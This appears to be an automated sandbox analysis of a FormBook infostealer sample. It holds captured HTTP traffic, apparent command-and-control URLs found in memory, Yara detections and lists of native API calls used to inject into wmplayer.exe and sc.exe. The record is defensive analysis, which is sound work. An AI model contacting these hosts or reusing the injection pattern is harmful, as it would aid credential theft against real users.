3156}v8\|Q7{LI.'vwm$9:I)qVH$%o;P(X\|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!),l`9fP+y"vJTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=70ed71b81025c39171072e3b0ce9172f%7C%7C1720198460%7C%7C1720194860%7C%7C9ca75b6a083e51ae3fd835288ebd32b3; expires=Fri, 02-Aug-2024 16:54:20 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=63p917bqijodufemh90e3p5q8d; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 18 f9 c0 11 2d 74 b5 81 15 42 0a 12 15 93 15 5a a1 cd 76 08 b9 a4 43 46 1c 37 24 03 37 72 cc d7 25 91 2e 51 bd e6 bb 7d 37 0c d6 a6 34 af 41 d3 9a 35 86 7a 9a e7 33 ec d3 96 4d fd 21 5b 23 a5 9d 1f 66 43 b0 66 3a 01 16 18 b0 d0 18 ad 89 11 58 13 e3 38 74 dd a1 cd 8a 86 3b 5e ad 4e da 78 cd d7 0c c2 89 cd 82 11 63 e1 1a b1 cc ed b5 5b c7 a8 f4 a8 6d f3 74 cd 08 82 04 2e 96 a7 65 32 10 8e d8 98 05 25 3f ea 33 27 28 81 5c b2 30 28 01 4c 29 c1 2c c2 97 9f 6f 99 8f bc 2f 96 d7 08 ca f6 f6 5a c8 ee c3 12 6f 6d cc 4c 8b 6e af 41 f1 65 a4 82 a8 85 e3 27 93 f8 cc 44 41 3b 7d db 35 6e Data Ascii: 3156}v8\|Q7{LI.'vwm$9:I)qVH$%o;P(X\|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!),l`9fP+y"vJTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=756559287fe03a4415a77fd29eb7083c%7C%7C1720198462%7C%7C1720194862%7C%7C3fd2ead987855aa39d85578e2a4e75dd; expires=Fri, 02-Aug-2024 16:54:22 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=srdaoiq9gdvc81bcuceegectf2; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 18 f9 c0 11 2d 74 b5 81 15 42 0a 12 15 93 15 5a a1 cd 76 08 b9 a4 43 46 1c 37 24 03 37 72 cc d7 25 91 2e 51 bd e6 bb 7d 37 0c d6 a6 34 af 41 d3 9a 35 86 7a 9a e7 33 ec d3 96 4d fd 21 5b 23 a5 9d 1f 66 43 b0 66 3a 01 16 18 b0 d0 18 ad 89 11 58 13 e3 38 74 dd a1 cd 8a 86 3b 5e ad 4e da 78 cd d7 0c c2 89 cd 82 11 63 e1 1a b1 cc ed b5 5b c7 a8 f4 a8 6d f3 74 cd 08 82 04 2e 96 a7 65 32 10 8e d8 98 05 25 3f ea 33 27 28 81 5c b2 30 28 01 4c 29 c1 2c c2 97 9f 6f 99 8f bc 2f 96 d7 08 ca f6 f6 5a c8 ee c3 12 6f 6d cc 4c 8b 6e af 41 f1 65 a4 82 a8 85 e3 27 93 f8 cc 44 41 3b 7d db 35 6e Data Ascii: 3156}v8\|Q7{LI.'vwm$9:I)qVH$%o;P(X\|g5(;kMl;b4}~l;mVtwwW]Xvk8&&m97gv!~hD!),l`9fP+y"vJTn,6R9B)iwBJnGZ9t.hipghd4eXZl[/74R(`>N$-tBZvCF7$7r%.Q}74A5z3M![#fCf:X8t;^Nxc[mt.e2%?3'(\0(L),o/ZomLnAe'DA;}5n

Source: sc.exe, 0000000D.00000002.3946994371.0000000004278000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000003AA8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://bqtt8ppp.com:301
Source: sc.exe, 0000000D.00000002.3946994371.0000000004BE4000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.0000000004414000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.bayviewcribbage.com
Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3948817261.0000000005854000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.bayviewcribbage.com/odz6/
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sc.exe, 0000000D.00000003.2503494724.0000000007EDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sc.exe, 0000000D.00000002.3942849584.0000000002F39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sc.exe, 0000000D.00000002.3946994371.000000000509A000.00000004.10000000.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.00000000048CA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr
Source: sc.exe, 0000000D.00000002.3949734927.0000000007F17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de/
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de/email_website/homepage-baukasten/
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de/login/
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de/neue-top-level-domain/
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de/unternehmen/datenschutz/
Source: sc.exe, 0000000D.00000002.3949616302.0000000006480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.united-domains.de/unternehmen/kontakt/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0042B163 NtClose,	6_2_0042B163
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033135C0 NtCreateMutant,LdrInitializeThunk,	6_2_033135C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312B60 NtClose,LdrInitializeThunk,	6_2_03312B60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03312DF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03312C70
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03314340 NtSetContextThread,	6_2_03314340
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03313010 NtOpenDirectoryObject,	6_2_03313010
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03313090 NtSetValueKey,	6_2_03313090
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03314650 NtSuspendThread,	6_2_03314650
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312BA0 NtEnumerateValueKey,	6_2_03312BA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312B80 NtQueryInformationFile,	6_2_03312B80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312BF0 NtAllocateVirtualMemory,	6_2_03312BF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312BE0 NtQueryValueKey,	6_2_03312BE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312AB0 NtWaitForSingleObject,	6_2_03312AB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312AF0 NtWriteFile,	6_2_03312AF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312AD0 NtReadFile,	6_2_03312AD0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033139B0 NtGetContextThread,	6_2_033139B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312F30 NtCreateSection,	6_2_03312F30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312F60 NtCreateProcessEx,	6_2_03312F60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312FB0 NtResumeThread,	6_2_03312FB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312FA0 NtQuerySection,	6_2_03312FA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312F90 NtProtectVirtualMemory,	6_2_03312F90
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312FE0 NtCreateFile,	6_2_03312FE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312E30 NtWriteVirtualMemory,	6_2_03312E30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312EA0 NtAdjustPrivilegesToken,	6_2_03312EA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312E80 NtReadVirtualMemory,	6_2_03312E80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312EE0 NtQueueApcThread,	6_2_03312EE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312D30 NtUnmapViewOfSection,	6_2_03312D30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312D10 NtMapViewOfSection,	6_2_03312D10
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03313D10 NtOpenProcessToken,	6_2_03313D10
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312D00 NtSetInformationFile,	6_2_03312D00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03313D70 NtOpenThread,	6_2_03313D70
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312DB0 NtEnumerateKey,	6_2_03312DB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312DD0 NtDelayExecution,	6_2_03312DD0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312C00 NtQueryInformationProcess,	6_2_03312C00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312C60 NtCreateKey,	6_2_03312C60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312CA0 NtQueryInformationToken,	6_2_03312CA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312CF0 NtOpenProcess,	6_2_03312CF0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03312CC0 NtQueryVirtualMemory,	6_2_03312CC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B4340 NtSetContextThread,LdrInitializeThunk,	13_2_035B4340
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B3090 NtSetValueKey,LdrInitializeThunk,	13_2_035B3090
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B4650 NtSuspendThread,LdrInitializeThunk,	13_2_035B4650
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B35C0 NtCreateMutant,LdrInitializeThunk,	13_2_035B35C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2B60 NtClose,LdrInitializeThunk,	13_2_035B2B60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_035B2BF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_035B2BE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_035B2BA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2AD0 NtReadFile,LdrInitializeThunk,	13_2_035B2AD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2AF0 NtWriteFile,LdrInitializeThunk,	13_2_035B2AF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B39B0 NtGetContextThread,LdrInitializeThunk,	13_2_035B39B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2F30 NtCreateSection,LdrInitializeThunk,	13_2_035B2F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2FE0 NtCreateFile,LdrInitializeThunk,	13_2_035B2FE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2FB0 NtResumeThread,LdrInitializeThunk,	13_2_035B2FB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_035B2EE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_035B2E80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_035B2D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_035B2D30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2DD0 NtDelayExecution,LdrInitializeThunk,	13_2_035B2DD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_035B2DF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_035B2C70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2C60 NtCreateKey,LdrInitializeThunk,	13_2_035B2C60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_035B2CA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B3010 NtOpenDirectoryObject,	13_2_035B3010
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2B80 NtQueryInformationFile,	13_2_035B2B80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2AB0 NtWaitForSingleObject,	13_2_035B2AB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2F60 NtCreateProcessEx,	13_2_035B2F60
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2F90 NtProtectVirtualMemory,	13_2_035B2F90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2FA0 NtQuerySection,	13_2_035B2FA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2E30 NtWriteVirtualMemory,	13_2_035B2E30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2EA0 NtAdjustPrivilegesToken,	13_2_035B2EA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B3D70 NtOpenThread,	13_2_035B3D70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B3D10 NtOpenProcessToken,	13_2_035B3D10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2D00 NtSetInformationFile,	13_2_035B2D00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2DB0 NtEnumerateKey,	13_2_035B2DB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2C00 NtQueryInformationProcess,	13_2_035B2C00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2CC0 NtQueryVirtualMemory,	13_2_035B2CC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B2CF0 NtOpenProcess,	13_2_035B2CF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E27B70 NtCreateFile,	13_2_02E27B70
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E27E40 NtClose,	13_2_02E27E40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E27F90 NtAllocateVirtualMemory,	13_2_02E27F90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E27CD0 NtReadFile,	13_2_02E27CD0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E27DB0 NtDeleteFile,	13_2_02E27DB0

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34681CC0	0_2_00007FFD34681CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD346850B0	0_2_00007FFD346850B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD346844FC	0_2_00007FFD346844FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD3468CA60	0_2_00007FFD3468CA60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD3468EF49	0_2_00007FFD3468EF49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34694F38	0_2_00007FFD34694F38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD3468BF39	0_2_00007FFD3468BF39
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34693F62	0_2_00007FFD34693F62
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34681048	0_2_00007FFD34681048
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34689828	0_2_00007FFD34689828
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34689820	0_2_00007FFD34689820
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD346908EA	0_2_00007FFD346908EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34688B38	0_2_00007FFD34688B38
